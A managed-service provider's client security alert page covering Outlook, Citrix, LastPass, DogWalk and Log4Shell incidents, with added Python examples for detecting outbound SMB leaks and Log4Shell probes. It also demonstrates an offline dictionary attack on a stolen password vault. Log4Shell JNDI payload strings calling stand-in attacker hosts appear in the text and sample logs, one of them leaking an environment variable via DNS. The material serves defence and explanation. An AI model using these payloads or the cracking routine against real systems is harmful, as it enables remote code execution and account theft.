IN ADDITION TO THE ALERTS BELOW, ECI UTILIZES A MASS NOTIFICATION PLATFORM TO COMMUNICATE WITH CLIENTS REGULARLY.
ECI Client Alerts
MARCH 2023: CRITICAL OUTLOOK VULNERABILITY (CVE-2023-23397) SOURCE: ECI
ECI has been made aware of a critical elevation of privilege vulnerability in Microsoft Outlook for Windows, CVE-2023-23397. An attacker sends the target a specially crafted message (a calendar item or task) whose reminder property points at a UNC path on an SMB server the attacker controls. When the reminder fires, Outlook connects to that share and authenticates automatically, leaking the user's Net-NTLMv2 response, which the attacker can relay to other services or crack offline. No user interaction is required beyond the message being received and processed by Outlook.
- For customers using ECI Managed SIEM services, we already have detection rules in place to alert us on successful outbound SMB traffic to the internet. The SOC team will investigate such incidents on a case-by-case basis.
- For customers using ECI-managed Palo Alto firewalls, we already have policies in place that block outbound SMB traffic to the internet.
- For all other customers, we are investigating different approaches to block outbound SMB traffic using alternative methods without causing service disruptions.
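The detection the SIEM rule above describes, as an added example that is not ECI's rule or code: it reads constructed firewall log lines in a hypothetical key=value format, treats RFC 1918, loopback and link-local addresses as "inside", and alerts only on allowed connections from an inside host to an external SMB port, since those are the flows that can carry a Net-NTLMv2 leak. The log format, the sample lines and the 203.0.113.0/24 and 198.51.100.0/24 addresses standing in for attacker hosts are all assumptions.

```python
import ipaddress
from dataclasses import dataclass

# Ports used by SMB: direct-hosted SMB on 445, NetBIOS session service on 139.
SMB_PORTS = {445, 139}

# Address ranges treated as "inside": RFC 1918, loopback and link-local.
# Anything else counts as the internet, including the RFC 5737 documentation
# ranges used below as stand-ins for attacker-controlled hosts.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    action: str  # "allow" or "deny"


def parse_flow(line: str) -> Flow:
    """Parse one constructed key=value firewall log line (hypothetical format)."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return Flow(fields["src"], fields["dst"], int(fields["dport"]), fields["action"])


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_outbound_smb_to_internet(flow: Flow) -> bool:
    """True when an inside host successfully reached an external SMB port.

    A denied flow still deserves a low-severity entry (someone tried), but
    only the allowed ones are candidate Net-NTLMv2 leaks.
    """
    return (flow.dport in SMB_PORTS
            and flow.action == "allow"
            and is_internal(flow.src)
            and not is_internal(flow.dst))


def find_outbound_smb(lines):
    """Return the flows that should raise a SOC alert."""
    flows = (parse_flow(line) for line in lines if line.strip())
    return [f for f in flows if is_outbound_smb_to_internet(f)]


# Constructed sample log; the external addresses are documentation ranges.
SAMPLE_LOG = [
    "src=10.1.2.3 dst=203.0.113.7 dport=445 action=allow",     # alert: workstation reached internet SMB
    "src=10.1.2.3 dst=10.1.2.200 dport=445 action=allow",      # normal: internal file server
    "src=10.1.2.3 dst=203.0.113.7 dport=445 action=deny",      # blocked at the edge, not a successful leak
    "src=10.1.2.4 dst=198.51.100.8 dport=443 action=allow",    # ordinary HTTPS
    "src=192.168.5.6 dst=198.51.100.9 dport=139 action=allow", # alert: NetBIOS session to the internet
]

if __name__ == "__main__":
    for flow in find_outbound_smb(SAMPLE_LOG):
        print(f"ALERT outbound SMB {flow.src} -> {flow.dst}:{flow.dport}")
```

On the sample above two flows alert and the denied attempt does not. One caveat when using a port-based rule as the only control: if TCP 445 is blocked, Windows can fall back to WebDAV over HTTP when the WebClient service is running, so pair the edge block with the Microsoft-recommended mitigations (adding high-value accounts to the Protected Users group and applying the patch) rather than relying on port 445 alone.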
Technical details can be found at the link(s) below:
CVE-2023-23397 - Security Update Guide - Microsoft - Microsoft Outlook Elevation of Privilege Vulnerability
Critical Microsoft Outlook bug PoC shows how easy it is to exploit (bleepingcomputer.com)
FEBRUARY 2023: MULTIPLE MICROSOFT AND CITRIX VULNERABILITIES SOURCE: ECI
ECI has been made aware of multiple security vulnerabilities in Microsoft and Citrix software products outlined below.
- CVE-2023-24483: Improper privilege management flaw leading to privilege escalation to NT AUTHORITY\SYSTEM. Impacts Citrix Virtual Apps and Desktops before 2212, 2203 LTSR before CU2, and 1912 LTSR before CU6.
- CVE-2023-24484: Improper access control flaw allowing log files to be written to a directory that should be out of reach for regular users. Impacts Citrix Workspace App for Windows before 2212, 2203 LTSR before CU2, and 1912 LTSR before CU6.
- CVE-2023-24485: Improper access control flaw leading to privilege escalation. Impacts Citrix Workspace App for Windows before 2212, 2203 LTSR before CU2, and 1912 LTSR before CU6.
- CVE-2023-24486: Improper access control flaw leading to session takeover. Impacts Citrix Workspace App for Linux before 2302.
- CVE-2023-21823: Windows Graphics Component Remote Code Execution Vulnerability allowing attackers to execute commands with SYSTEM privileges.
- CVE-2023-21715: Microsoft Publisher Security Features Bypass Vulnerability allowing a specially crafted document to bypass Office macro policies that block untrusted or malicious files. Exploiting this flaw would effectively allow macros in a malicious Publisher document to run without first warning the user.
- CVE-2023-23376: Windows Common Log File System Driver Elevation of Privilege Vulnerability allowing attackers to gain SYSTEM privileges upon exploitation.
We are actively monitoring the situation and reviewing uses of related software internally and at our customers. We are planning to apply updates and patches using our remote management and monitoring (RMM) toolset, or manually where necessary. You will be informed if any of the necessary changes impact your services.
Note that ECI employs a defence-in-depth approach to your security which provides layered protection across multiple attack vectors. Please stand by for further updates as we perform our investigation.
JANUARY 2023: MS DEFENDER DELETING SHORTCUTS SOURCE: ECI
We have been noticing issues across a number of customers caused by a bug in the most recent definition update for Microsoft Defender for Endpoint. Based on the preliminary reports we have collected, the bug is causing application shortcuts for Microsoft Office and a number of other applications to be removed from desktop and start menu.
Microsoft has rolled back the Attack Surface Reduction (ASR) rule responsible ("Block Win32 API calls from Office macros"), and we are remediating the problem for affected customers on a case-by-case basis until the vendor releases a working solution to restore the missing or malfunctioning shortcuts.
We will continue to monitor the situation and provide you with updates as they become available.
You can find more information about this incident here.
DECEMBER 2022: LASTPASS BREACH SOURCE: ECI
On December 22, 2022, LastPass notified its customers that an unauthorized party had gained access to its environment and stolen backups of customers' encrypted password vaults along with unencrypted metadata such as website URLs. Below is a list of our recommendations based on the preliminary information currently available on this breach.
- We recommend all LastPass users to reset their master passwords immediately. The master password should not be used anywhere else.
- Despite the vendor's assurances about the safety of the stolen vaults, we recommend that users err on the side of caution and reset all passwords stored in LastPass, with higher priority given to critical accounts such as banking, e-mail, and social media. This is especially important for users who have used short or easy-to-remember master passwords for their vaults.
- Users who protect their LastPass login with MFA (software or hardware tokens) should also follow the steps above. MFA greatly reduces the risk to online accounts, but it plays no part in the encryption of the vault itself, so it offers no protection against offline attacks on a stolen copy.
- We are expecting to see an increase in the number of phishing attacks where the scammers attempt to take advantage of this incident and lure users to click on links in order to “update their passwords”.
- We recommend adding your accounts to a Dark Web monitoring service so you get notified if any of your credentials are leaked to the dark web. You can add your accounts on a free service such as haveibeenpwned.com, or leverage ECI Dark Web Monitoring service for better visibility into the content on the Dark Web for both corporate and personal accounts beyond just usernames and passwords.
- To further harden your LastPass vault, consider raising the number of PBKDF2 iterations applied to your master password from the historical default of 100,100 to the 310,000 recommended by OWASP for PBKDF2-HMAC-SHA256. Note that this only protects copies of the vault taken after the change; the stolen backups were derived with whatever setting was in place at the time, which is why rotating the passwords inside the vault remains the primary recommendation.
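Why a weak master password is exposed regardless of MFA, and what the iteration count changes, as an added example that is not LastPass's code or ECI's: the key derivation below is modelled on the publicly described LastPass scheme (PBKDF2-HMAC-SHA256 with the lowercased e-mail as salt), and that modelling is an assumption. The "does this key open the vault" check is a stand-in HMAC rather than the real AES decryption of the stolen blob; both cost almost nothing next to PBKDF2, so the per-guess cost the example measures is realistic. The victim, wordlist and e-mail address are constructed.

```python
import hashlib
import hmac
import time

LEGACY_ITERATIONS = 100_100   # the historical LastPass default mentioned above
OWASP_ITERATIONS = 310_000    # OWASP recommendation for PBKDF2-HMAC-SHA256 at the time


def derive_vault_key(master_password: str, email: str, iterations: int) -> bytes:
    """Vault key = PBKDF2-HMAC-SHA256(password, salt=lowercased e-mail).

    Modelled on the publicly described LastPass derivation (assumption).
    """
    return hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                               email.lower().encode(), iterations, dklen=32)


def vault_check_value(vault_key: bytes) -> bytes:
    """Stand-in for "does this key decrypt the vault?".

    The real check is an AES-256 decryption of the stolen blob; an HMAC over
    a fixed string plays the same role here at comparable (negligible) cost.
    """
    return hmac.new(vault_key, b"vault-check", hashlib.sha256).digest()


def offline_attack(check_value: bytes, email: str, iterations: int, candidates):
    """Try each candidate master password against the stolen vault.

    Returns (password, guesses_used) or (None, guesses_used). No MFA secret
    appears anywhere: MFA gates the login to the service, not the math on a
    blob the attacker already holds.
    """
    for n, guess in enumerate(candidates, 1):
        key = derive_vault_key(guess, email, iterations)
        if hmac.compare_digest(vault_check_value(key), check_value):
            return guess, n
    return None, len(candidates)


def seconds_per_guess(iterations: int, email: str = "user@example.com") -> float:
    """Time one derivation; the ratio between iteration counts is what
    raising the setting buys against this attack."""
    start = time.perf_counter()
    derive_vault_key("timing-probe", email, iterations)
    return time.perf_counter() - start


def crack_time_hours(keyspace: int, guesses_per_second: float) -> float:
    """Worst-case hours to exhaust a keyspace at a given attacker speed."""
    return keyspace / guesses_per_second / 3600


# Constructed victim: a short, memorable master password at the legacy iteration count.
EMAIL = "alice@example.com"
WEAK_MASTER = "Summer2022!"
STOLEN_CHECK = vault_check_value(derive_vault_key(WEAK_MASTER, EMAIL, LEGACY_ITERATIONS))
WORDLIST = ["password", "letmein", "Summer2022!", "Winter2021!"]  # constructed

if __name__ == "__main__":
    pw, n = offline_attack(STOLEN_CHECK, EMAIL, LEGACY_ITERATIONS, WORDLIST)
    print(f"cracked {pw!r} after {n} guesses")
    legacy, owasp = seconds_per_guess(LEGACY_ITERATIONS), seconds_per_guess(OWASP_ITERATIONS)
    print(f"{legacy:.3f}s vs {owasp:.3f}s per guess on this CPU, ratio {owasp / legacy:.1f}x")
```

The attacker's cost scales linearly with the iteration count, so 310,000 rounds makes every guess roughly three times more expensive than 100,100; a GPU rig still runs many such guesses per second, which is why a short or dictionary-based master password falls quickly at either setting and a long random one does not.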
AUGUST 2022: ECI CYBERSECURITY ADVISORY - CVE-2022-34713 (DOGWALK) SOURCE: ECI
Microsoft has released a patch for CVE-2022-34713, a remote code execution vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) that Microsoft describes as a variant of the bug publicly known as DogWalk. It is related to the MSDT vulnerability CVE-2022-30190 ("Follina"), which was disclosed in May 2022 and patched in June 2022.
The vulnerability allows an attacker to run arbitrary commands on the target device by convincing the user to open a malicious file delivered by e-mail or hosted on a website. No authentication on the victim's machine is required, and the flaw is being actively exploited in the wild.
What has been done:
Execution Prevention – ECI Managed Cloud Services or ECI Managed Endpoint Protection
We have confirmed that all known variants of this attack can be detected and blocked by SentinelOne agents.
Detection – ECI Managed SIEM or ECI Cyber Bundle
Detection rules have been added to the ECI Managed SIEM and the SOC will monitor for any suspicious activity.
Patching – ECI Managed Cloud Services, ECI Patch Management, or ECI Cyber Bundle
The required software patches will be applied to all Windows workstation devices throughout this week, and on all Windows servers over the weekend (August 20-21).
Customers who do not use any of the services above are highly recommended to manually update all Windows devices as soon as possible and implement the necessary detection rules on their EDR and SIEM platforms.
Customers also have the option to contact their account team and request to opt-out of this weekend’s emergency patch, deferring it to their regular patching schedule.
Please contact our global support desk or reach out to your Customer Success Manager by phone or email for any further questions. We will continue to provide you with more updates on this advisory.
FEBRUARY 2022: ECI RESPONSE TO THE CURRENT CYBERSECURITY THREATS SOURCE: ECI
With the escalation of the conflict in Ukraine, we want to give an update on what we are doing to protect businesses (yours and ours) from cybersecurity threats. We continue to monitor the threat landscape as we always do. Although we conduct scheduled risk assessments as part of our cyber program, we have initiated a Ukraine-specific assessment using guidance provided by the U.S. Cybersecurity & Infrastructure Security Agency (CISA) [cisa.gov].
Currently, most Russian attacks have been directed at Ukraine. Specifically, Ukraine has been hit with data-wiper malware, which makes secure, offline backups as important as ever. An important aspect of the Russian threat is that your operations could be indirectly impacted by attacks on other organizations: Russia is known to launch attacks against banks and broad-based infrastructure such as electricity, water, and transportation.
SentinelOne, ECI's EDR partner, is continually monitoring threat intelligence for known and emerging malware related to the current situation. Our clients are protected against the HermeticWiper malware circulating in Ukraine. ECI currently has over 12,000 protected endpoints under management.
With over 600 detection rules in place, our Security Information and Event Management (SIEM) platform continually monitors for indicators of compromise (IOCs) specific to this event and for other threats, mapped to the MITRE ATT&CK framework.
- Apply patches for known vulnerabilities promptly to reduce exposure.
- Keep an eye out for suspicious traffic reaching your organization from outside the country.
- Keep an eye out for suspicious e-mails and phishing activity within your organization.
As always, ECI will be closely monitoring the situation and sharing information pertaining to any potential threats that it might pose. If you have any questions, please contact your ECI representative.
DECEMBER 2021: LOG4J ZERO-DAY VULNERABILITY SOURCE: ECI
A critical vulnerability, CVE-2021-44228 (also known as Log4Shell), has been discovered in Apache Log4j 2, an open-source Java logging library used by many popular applications. An attacker who can get a string such as ${jndi:ldap://attacker-host/x} written into a log, for example through an HTTP header or a form field, can make the vulnerable library (versions 2.0-beta9 through 2.14.1) fetch and execute attacker-supplied code, enabling remote code execution on countless servers.
For more information concerning Log4j Zero-Day Vulnerability, please see details published here: https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
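A way to find exploitation attempts in web server logs, as an added example rather than anything from the article linked above: Log4j resolves nested lookups from the inside out, and attackers hide the word "jndi" behind ${lower:...}, ${upper:...} and default-value lookups such as ${::-j}. The scanner below emulates just those lookups until the string stops changing, then looks for a JNDI reference to a remote resolver. The access-log lines and the 203.0.113.5 address are constructed.

```python
import re

# Innermost ${...} lookup, i.e. one whose body contains no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, a JNDI lookup naming a remote resolver is the smoking gun.
JNDI_PROBE = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|nis|http)", re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Emulate the Log4j lookups attackers use to obfuscate 'jndi'."""
    if ":-" in body:                        # ${x:-default} and ${::-j} -> the default value
        return body.split(":-", 1)[1]
    name, sep, rest = body.partition(":")
    if sep and name.lower() == "lower":     # ${lower:J} -> j
        return rest.lower()
    if sep and name.lower() == "upper":     # ${upper:j} -> J
        return rest.upper()
    return body                             # any other lookup: keep the body, drop the ${}


def normalize(message: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), message)
        if resolved == message:
            break
        message = resolved
    return message


def is_log4shell_probe(message: str) -> bool:
    return JNDI_PROBE.search(normalize(message)) is not None


def scan(lines):
    """Return the indexes of lines carrying a JNDI lookup attempt."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed access-log lines: index 0 and 4 are benign, the rest are probes.
SAMPLE_ACCESS_LOG = [
    '10.0.0.1 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.2 "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.3 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:LDAP}://203.0.113.5/a}"',
    '10.0.0.4 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.5/a}"',
    '10.0.0.5 "GET / HTTP/1.1" 200 "build ${java:version} check"',
    '10.0.0.6 "GET / HTTP/1.1" 200 "${jndi:dns://203.0.113.5/${env:USER}}"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_ACCESS_LOG):
        print(f"line {i}: {normalize(SAMPLE_ACCESS_LOG[i])}")
```

Matching the literal text "${jndi:" would miss lines 3 and 4 of the sample; normalising first catches them while still leaving the harmless ${java:version} lookup alone. A hit in an access log means a probe reached the server, not that Log4j executed it, so the follow-up is to check which applications on that host log the offending field and whether they run a vulnerable version.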
SEPTEMBER 2021: APPLE’S EMERGENCY PATCH FOR 'FORCEDENTRY' (IMESSAGE FLAW, CVE-2021-30860) SOURCE: ECI
On September 13, 2021, it was announced that a zero-click, zero-day exploit named 'FORCEDENTRY' had been discovered targeting Apple products (iPhone, iPad, Mac, and Apple Watch). It abuses a flaw in the processing of a maliciously crafted PDF delivered through iMessage (CVE-2021-30860, in CoreGraphics) to install the Pegasus spyware without any action by the user. This gives the operator access to the target device, including personal data, photos, messages and location.
Apple has released emergency patches to address the zero-day flaw. ECI recommends immediately updating your Apple products to address this vulnerability.
JULY 2021: KASEYA VSA POTENTIAL ATTACK SOURCE: ECI
Please be advised that we have been made aware of an attack against Kaseya (an IT management software provider used by many MSPs), specifically affecting their on-premises VSA solution, in which compromised VSA servers were used to push ransomware to the endpoints they manage.
You can get the latest updates from Kaseya following the link: https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
JANUARY 28, 2021: APPLE IOS ALERT SOURCE: ECI
Please note that Apple has released iOS 14.4 which, in addition to the features listed here, includes fixes for a number of known vulnerabilities. The security content of iOS 14.4 is described in this document here. Among the fixes are WebKit bugs that Apple reports may have been actively exploited; they allow a remote attacker, via a malicious web page, to cause arbitrary code execution.
Following this latest Apple release, ECI recommends that you update your corporate and personal Apple iOS devices to iOS 14.4 as soon as possible.
JANUARY 13, 2021: MIMECAST SECURITY ALERT SOURCE: ECI
Eze Castle Integration has been made aware of a breach at Mimecast, attributed to the threat actor behind the SolarWinds compromise, in which a Mimecast-issued certificate used by some customers to connect Mimecast services to Microsoft 365 was compromised. We are actively monitoring the situation and will notify our customers of any known impact to their e-mail. At this time we know that approximately 10% of Mimecast customers use the affected certificate-based connection, and Mimecast has already reached out to them directly. We are in the process of determining which of our clients use the certificate-based connection for Microsoft 365.
Customers that leverage Proofpoint do not appear to be affected by this breach.
Note that Eze Castle Integration employs a defence-in-depth approach to your security which provides layered protection across multiple attack vectors. Please stand by for further updates as we perform our investigation.
For additional information on the breach please see Mimecast’s response here.